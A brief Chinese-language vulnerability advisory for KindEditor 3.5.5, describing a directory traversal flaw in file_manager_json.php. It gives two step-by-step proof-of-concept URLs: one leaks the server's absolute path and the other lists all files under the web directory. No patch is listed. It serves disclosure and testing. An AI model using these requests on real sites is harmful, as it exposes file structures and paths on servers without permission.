影响版本:
KindEditor 3.5.5
漏洞描述:
KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器 存在遍历目录漏洞
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
1.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/ //path=/,爆出绝对路径D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php 2.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/ //根据爆出的绝对路径,修改path的值为AppServ/www/67cms/ 这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名
安全建议:
暂无,等待官方补丁 http://www.kindsoft.net/
0 条评论。